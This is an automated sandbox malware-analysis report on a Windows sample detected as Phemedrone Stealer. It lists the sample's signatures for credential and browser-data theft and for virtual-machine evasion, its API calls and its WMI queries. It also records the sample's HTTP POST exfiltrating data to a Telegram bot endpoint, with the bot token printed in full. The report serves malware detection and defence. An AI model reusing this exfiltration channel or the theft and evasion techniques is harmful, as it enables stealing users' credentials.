Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ls4O6Pmixd.exe

Overview

General Information

Sample name:Ls4O6Pmixd.exe
renamed because original name is a hash value
Original sample name:16e8183843e73d742ee2f2d334b8c6c0.exe
Analysis ID:1576577
MD5:16e8183843e73d742ee2f2d334b8c6c0
SHA1:5167fa0c1f5771e2a24aab9c25633e81bbdae157
SHA256:02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
Tags:exeuser-abuse_ch
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
AI detected suspicious sample
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • Ls4O6Pmixd.exe (PID: 5200 cmdline: "C:\Users\user\Desktop\Ls4O6Pmixd.exe" MD5: 16E8183843E73D742EE2F2D334B8C6C0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
      00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
        00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
          00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
            Click to see the 5 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Ls4O6Pmixd.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: Ls4O6Pmixd.exeVirustotal: Detection: 41%Perma Link
            Source: Ls4O6Pmixd.exeReversingLabs: Detection: 57%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Ls4O6Pmixd.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5431E0 CryptUnprotectData,4_2_00007FFAAC5431E0
            Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49701 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: Ls4O6Pmixd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.26.0.100 104.26.0.100
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457Host: api.telegram.orgContent-Length: 733555Expect: 100-continueConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.7:49701 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: get.geojs.io
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd1e4d34176457Host: api.telegram.orgContent-Length: 733555Expect: 100-continueConnection: Keep-Alive
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000026BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument(United
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument0
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/freakcodingspot
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .:"%
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .W!:
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC536E48 NtUnmapViewOfSection,4_2_00007FFAAC536E48
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53706D NtOpenFile,4_2_00007FFAAC53706D
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5369E4 NtClose,4_2_00007FFAAC5369E4
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC536AC8 NtProtectVirtualMemory,4_2_00007FFAAC536AC8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC536BF9 NtAllocateVirtualMemory,4_2_00007FFAAC536BF9
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC537599 NtQueryVolumeInformationFile,4_2_00007FFAAC537599
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5376A8 NtDeviceIoControlFile,4_2_00007FFAAC5376A8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5371B1 NtCreateSection,4_2_00007FFAAC5371B1
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC537410 NtMapViewOfSection,4_2_00007FFAAC537410
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5376A8: NtDeviceIoControlFile,4_2_00007FFAAC5376A8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC553E004_2_00007FFAAC553E00
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52EEE04_2_00007FFAAC52EEE0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC529ED04_2_00007FFAAC529ED0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5209184_2_00007FFAAC520918
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5209504_2_00007FFAAC520950
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC54BB974_2_00007FFAAC54BB97
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC534BE94_2_00007FFAAC534BE9
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52F5404_2_00007FFAAC52F540
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC54B6284_2_00007FFAAC54B628
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53B6184_2_00007FFAAC53B618
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5207204_2_00007FFAAC520720
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5207A74_2_00007FFAAC5207A7
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52E2064_2_00007FFAAC52E206
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5424004_2_00007FFAAC542400
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5383F84_2_00007FFAAC5383F8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5293BD4_2_00007FFAAC5293BD
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC530D7D4_2_00007FFAAC530D7D
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC529F484_2_00007FFAAC529F48
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53301D4_2_00007FFAAC53301D
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52B0304_2_00007FFAAC52B030
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5280344_2_00007FFAAC528034
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52B9384_2_00007FFAAC52B938
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5209384_2_00007FFAAC520938
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52B9484_2_00007FFAAC52B948
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52BA004_2_00007FFAAC52BA00
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53B9F24_2_00007FFAAC53B9F2
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC528A6A4_2_00007FFAAC528A6A
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52CB224_2_00007FFAAC52CB22
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC529B904_2_00007FFAAC529B90
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC529B6D4_2_00007FFAAC529B6D
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52BB784_2_00007FFAAC52BB78
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC526C074_2_00007FFAAC526C07
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC520C084_2_00007FFAAC520C08
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC520BE84_2_00007FFAAC520BE8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC520CA84_2_00007FFAAC520CA8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52A5004_2_00007FFAAC52A500
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5355E54_2_00007FFAAC5355E5
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5215C54_2_00007FFAAC5215C5
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5205D54_2_00007FFAAC5205D5
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5207104_2_00007FFAAC520710
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5207B84_2_00007FFAAC5207B8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52A7914_2_00007FFAAC52A791
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5327914_2_00007FFAAC532791
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52A8014_2_00007FFAAC52A801
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52B8904_2_00007FFAAC52B890
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52384B4_2_00007FFAAC52384B
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5341414_2_00007FFAAC534141
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5292714_2_00007FFAAC529271
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC5382E84_2_00007FFAAC5382E8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52749E4_2_00007FFAAC52749E
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC52A4794_2_00007FFAAC52A479
            Source: Ls4O6Pmixd.exe, 00000004.00000000.1270543407.000000000015A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs Ls4O6Pmixd.exe
            Source: Ls4O6Pmixd.exeBinary or memory string: OriginalFilenamesystem.exeH vs Ls4O6Pmixd.exe
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@2/2
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ls4O6Pmixd.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeMutant created: \Sessions\1\BaseNamedObjects\Orajagohavurucutabimixoxatitova
            Source: Ls4O6Pmixd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 860
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6892
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3012
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4300
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3868
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2572
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3432
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 412
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5340
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4288
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5148
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6008
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6436
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4460
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3848
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5140
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3840
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6424
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6852
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5124
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2536
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3828
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1668
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2960
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2356
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6400
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2948
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 360
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6392
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 356
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5092
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1212
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5520
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6580
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1636
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5512
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3784
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5076
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4644
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4212
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 328
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2912
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1608
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6348
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4184
